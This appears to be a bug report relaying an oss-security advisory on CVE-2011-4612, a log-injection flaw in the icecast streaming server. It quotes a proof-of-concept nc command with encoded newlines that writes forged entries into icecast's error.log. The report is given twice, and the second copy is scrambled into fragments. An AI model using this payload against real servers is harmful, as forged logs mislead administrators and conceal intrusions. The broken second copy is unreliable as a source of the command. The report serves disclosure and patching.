Your friendly security team received the following report via oss-security. Please respond ASAP. The issue is public.
CVE-2011-4612
It was found that remote users could inject newlines in the error.log of icecast, therefore forging log entries
Citing https://launchpad.net/bugs/894782:
Running this command against an icecast2 running on 127.0.0.1...
echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d% 0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d% 0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN% 20fserve/fserve_client_create%20req%20for%20file% 20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null
...causes the following to be written to /var/log/icecast2/error.log: [2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file /non-existent" No such file or directory [1970-01-01 00:00:00] PHUN I'm feeling phunny ..."
Your friendly security team received the following report via oss-security.
Please respond ASAP.
The issue is public.
CVE-2011-4612
It was found that remote users could inject newlines in the error.log of icecast, therefore forging log entries
Citing https:/ /launchpad. net/bugs/ 894782:
Running this command against an icecast2 running on 127.0.0.1...
echo -ne "GET /non-existent" '"'"%20No% 20such% 20file% 20or%20director y%0d% 01-01%20% 2000:00: 00]%20PHUN% 20I'm%20feeling %20phunny% 0d% %d%%20% %20%H:% M:%S"`" ]%20WARN% fserve_ client_ create% 20req%20for% 20file% /usr/share/ icecast2/ web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000
0a[1970-
0a["`date "+%Y-%m-
20fserve/
20"'"'"
> /dev/null
...causes the following to be written to /var/log/ icecast2/ error.log: fserve_ client_ create checking for
[2011-11-25 15:37:31] INFO fserve/
file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
..."